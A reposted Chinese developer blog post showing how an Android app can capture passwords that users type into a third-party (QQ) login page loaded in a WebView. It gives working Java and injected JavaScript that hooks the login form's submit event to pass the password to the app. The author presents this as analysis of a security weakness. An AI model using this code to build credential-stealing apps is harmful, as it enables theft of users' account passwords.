WebView处理三方登录问题

转载 2016年05月31日 10:58:10
转载请注明出处:http://blog.csdn.net/singwhatiwanna/article/details/17663345

前言

这是一个很有趣的话题,WebView在Android中包括IOS中都是一个很重要的控件,有了它,我们可以直接在应用里打开网页而不用跳到浏览器,且网页效果和浏览器几乎一样,这样会增强用户体验,当然也有缺点:占用内存太大,因为WebView加载网页所耗费的内存全部算在你的应用的堆里,如果不做特殊处理,你的应用就更容易OOM了。但是这不是我们今天所讨论的话题,我今天要介绍的是:如果利用WebView强大的特性来做一些有意义的事,比如违规存储第三方登录平台的账号信息(比如QQ登录平台、新浪微博等),为什么说是违规存储,因为第三方登录平台肯定不愿意将自己的账号信息给你,尤其是账户密码,因为这涉及到账户安全。当然,本次分析只讨论技术可行性,不讨论实际可行性,确切来说,完成这一切要有一个前提:你的应用接入了第三方登录平台(这个很常见)并且你有权利通过你的应用去收集账号信息(这个很难,但是你做个山寨应用是可以做到的)。另外,由于本文重点不是介绍如何使用WebView,所以基础知识请大家自行了解下。还有,博主写本文只是和大家分析技术,同时指出问题,并不是鼓励大家去搞破坏。

WebView重要的特性

  • WebView支持JavaScript,一般的应用为了获得正常的体验效果,往往还会设置WebViewClient(页面加载进度相关接口)和WebChromeClient(网页弹出对话框相关接口等),总之,通过合理的设置,一个WebView基本可以做到和浏览器访问页面一样的效果
  • WebView支持在Android代码中执行JavaScript语句:mWebView.loadUrl("javascript:" + mJsString)
  • WebView支持在JavaScript中执行Android语句(这个特性Google官方的解释是:使用的时候尤其要注意安全性):mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface")

好了,有了上面几个特性,我们就可以进入正题了

第三方账号登录平台所存在的安全隐患

这里以QQ账号接入平台为例,下面将会演示一个如何违规存储第三方账号信息的方法,由于除了Android还涉及到JavaScript、HTML等东西,所以具体的实现上可能会有细微差别(因为HTML和JavaScript会改变),但是思想是不变的。

下面是一段QQ接入平台的登录页面的HTML代码,我进行了删减,大体如下所示:

[html] view plain copy
 在CODE上查看代码片派生到我的代码片
  1. <!DOCTYPE html>  
  2. <html>  
  3. <head>  
  4. <meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" />  
  5. <meta name="viewport" content="width=device-width; initial-scale=1.0; minimum-scale=1.0; maximum-scale=1.0"/>  
  6. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>  
  7. <meta content="telephone=no" name="format-detection">  
  8. <meta http-equiv="Expires" content="0"/>  
  9. <meta http-equiv="Pragma" content="no-cache"/>  
  10. <meta http-equiv="Cache-Control" content="no-cache,no-store,max-age=0,s-maxage=0,must-revalidate" />  
  11.     <title>帐号设置</title>  
  12. </head>  
  13. <body class="unilogin" style="height:100%">  
  14.     <div id="ptlogin-container">  
  15.         <h1 id="title">帐号设置</h1>  
  16.         <!--  普通登录 -->  
  17.         <!--注意:我们只要在这里执行我们的代码就可以了,因为登录的时候表单提交会执行onsubmit  
  18.         或者就算HTML不是这么写的,也没关系,我们的本意是当表单提交的时候能执行我们的代码就行了  
  19.         我们只要在Android中执行一段js,通过js给表单的onsubmit事件加入我们的代码,估计难不倒各位  
  20.         -->  
  21.         <form onsubmit="return false;">  
  22.             <fieldset id="loginBox" class="loginfiled" style="display:none">  
  23.                 <p>  
  24.                     <lable class="input-title">帐 号</lable>  
  25.   
  26.                         <input type="tel" id="ptlogin-name" placeholder="请输入QQ号"/>  
  27.                         <a class="empty" id="clearQQ" style="display:none;">清除</a>  
  28.                 </p>  
  29.                 <p>  
  30.                     <lable class="input-title">密 码</lable>  
  31.                     <input type="password" id="ptlogin-password" placeholder="请输入密码">  
  32.                     <a class="empty" id="clearPwd" style="display:none;">清除</a>  
  33.                 </p>  
  34.             </fieldset>  
  35.             <div class="varify-wrapper clearfix" id="verify_box" style="display:none">  
  36.                 <div class="show-varify fr clearfix">  
  37.                     <div class="img-varify fl">  
  38.                         <img id="verifyPic" src="http://3gimg.qq.com/wap30/img/netdisk/verification-code.png" width="110" height="38"></div>  
  39.                         <div class="fl"><a id="reVerify" href="#">换一张</a></div>  
  40.                     </div>  
  41.                 <div class="fl"><input id="ptlogin-imgVerify" type="text" placeholder="输入验证码"></div>  
  42.             </div>  
  43.             <input id="isNeedSid" type="hidden" name="isNeedSid" value=1 />  
  44.                 <input id="bid" type="hidden" name="bid" value=flashgame />  
  45.                 <p><input id="ptlogin-submit" class="btn-login" type="submit" value="登 录" style="display:none"></p>  
  46.         </form>  
  47.     </div>  
  48.     <!--无法登录-->  
  49.     <div class="common-box box-sm" id="ptlogin-prompt-1" style="display: none">  
  50.         <h3 class="bd-bm-bk" id="login-errmsg">登录过于频繁,请稍后再试</h3>  
  51.         <div class="btn-md">  
  52.             <input id="ptlogin-relog-1" class="btn-dialog btn-cancel" type="reset" value="确定">  
  53.         </div>  
  54.     </div>  
  55.     <!--出错提示-->  
  56.     <div class="common-box box-error" id="ptlogin-prompt-2" style="display:none;">  
  57.         <h3 class="bd-bm-bk" id="login-errmsg">登录密码错误,请重新输入</h3>  
  58.         <div class="btn-md">  
  59.             <input id="forget-pwd-1" class="btn-dialog" type="button" value="忘记密码">  
  60.             <input id="ptlogin-relog-2" class="btn-dialog" type="reset" value="重新输入">  
  61.         </div>  
  62.     </div>  
  63.     <!--正在登录-->  
  64.     <div class="load-box" style="display:none;">  
  65.         <div class="load-circle"></div>  
  66.         <p>登录中...</p>  
  67.     </div>  
  68. </body>  
  69. </html>  

实现思想:

首先向WebView注入Java对象,在WebView加载完毕的时候执行一段js,给表单提交事件关联上我们的代码,即让表单提交的时候执行所注入的Java对象的一个方法,js执行我们的方法的时候可以把qq号和密码作为参数传递过来,然后我们就可以保存了。下面的步骤只示范如何把qq密码存下来,不过,存qq号是一样的方法,多传递一个参数就行了。

实现步骤:

第一步:声明要注入的Java对象

[java] view plain copy
 在CODE上查看代码片派生到我的代码片
  1. public class SavePasswordJavaScriptInterface    
  2. {    
  3.     public void savePassword(final String password)  
  4.     {    
  5.         Log.w("ATTACK""enter spjsinterface:"+ password);  
  6.   
  7.         mHandler.post(new Runnable()  
  8.         {    
  9.             @Override    
  10.             public void run()  
  11.             {  
  12.                 //这里就是用户登录的密码了,你可以存起来了  
  13.                 mPassword = password;  
  14.                 Log.w("ATTACK", mPassword);  
  15.             }    
  16.         });    
  17.     }   
  18. }  

第二步:注入上述对象

[java] view plain copy
 在CODE上查看代码片派生到我的代码片
  1. //这里是注入Java对象  
  2. mWebView.addJavascriptInterface(new SavePasswordJavaScriptInterface(), "SPJSInterface");  
  3. //这里是打开登录平台页面  
  4. mWebView.loadUrl(LOGIN_URL);  

第三步:在WebViewClient中的onPageFinished方法中注入js,这样当登录的时候就会调用我们之前注入的Java对象,同时乖乖地把密码作为参数传过来

[java] view plain copy
 在CODE上查看代码片派生到我的代码片
  1. @Override  
  2. public void onPageFinished(WebView view, String url)  
  3. {  
  4.     super.onPageFinished(view, url);  
  5.     //仅当是登录url的时候才注入我们的js,不要任何url都注入  
  6.     if (url.equals(LOGIN_URL)) {  
  7.         //要注入的js  
  8.         String js = "document.forms[0].onsubmit=function(event){var pwd = document.getElementById(\"ptlogin-password\").value;window.SPJSInterface.savePassword(pwd);return false;}";  
  9.         Log.w("ATTACK""inject js, js= " + js);  
  10.         view.loadUrl("javascript:" + js);  
  11.     }  
  12. }  

总结一下

从上面三个步骤,我们就可以获取第三方接入平台的账号信息了。这里我再简述一下思想:首先注入java对象,当登录页面加载完成以后,再注入一段js,让登录表单在提交的时候能够执行我们之前注入的java对象的方法,然后就行了,等用户输入账号信息点击登录的时候,我们的方法就会被调用,而方法的参数就是账号信息。不同的接入平台注入对的js应该是不一样的,但是这个我相信绝对难不倒大家。不知道会不会有些朋友觉得不好理解,主要是因为用到了java和js的交互,涉及到html中表单的提交和js中的事件,这些知识是属于前端开发范畴的,所以我没有去详细地介绍它,感兴趣的小伙伴们可以自己了解下html和js。

相关文章推荐

Android Studio总结Xutils3等第三方依赖库导入问题总结

转载请注明出处:http://blog.csdn.net/y1258429182/article/details/50354146 最快的引入方法(需要联网)步骤1:步骤2: 或者 问题2:Gr...

SuperMap iServer 7C在东方通TongWeb等第三方中间件中的安装部署及常见问题

SuperMap iServer 7C在东方通TongWeb等第三方中间件中的安装部署及常见问题 介绍Supermap iServer 7C如何在东方通上进行部署 windows平台及linux平台中...

关于Android引入高德地图、百度地图、Qrcode、Jpush等三方架包报32位、64位找不到问题

这个错误信息在一个项目中引入高德地图、百度地图、Jpush、Ping++、二维码扫描Qrcode等三方架包时应该会遇到下面这个报错信息: java.lang.UnsatisfiedLinkErr...

ant build.xml 打包应三方jar注意的问题与混淆R的写法

老规矩我们还是来看看说在前面的话:首先我们得分清楚android在打包成apk的过程中要经过哪几个步骤: Android编译的具体流程如下: 1)  ndk-build编译native代码生成so...

iOS 解决一个因三方静态库冲突产生的duplicate symbol的问题

http://www.cnblogs.com/rayshen/p/5160218.html 最近在开发项目时编译三方.a时出现了冲突,原因是存在duplicate symbol。...

Android webview处理404、500、断网、timeout页面的问题(by 星空武哥)

转载请标注原创地址:http://blog.csdn.net/lsyz0021/article/details/56677132现在混合开发的app越来越多,Google对webview也越来越重视,...

程序员面试经典问题集以及offer,三方协议等常识

本文目的:增加 1、请你自我介绍一下你自己, 回答提示:一般人回答这个问题过于平常,只说姓名、年龄、爱好、工作经验,这些在简历上都有,其实,企业最希望知道的是求职者能否胜任工作,包括:最强的技能、最...

Android学习之实现WebView中input="file"选择文件,处理选择图片无法返回类型问题

// js上传文件的事件捕获 private ValueCallback mUploadMessage; private final int FILECHOOSER_RESULTCODE =...

iOS三方登录代码

一键登录三方网站

  • 2013-12-26 00:15
  • 532KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)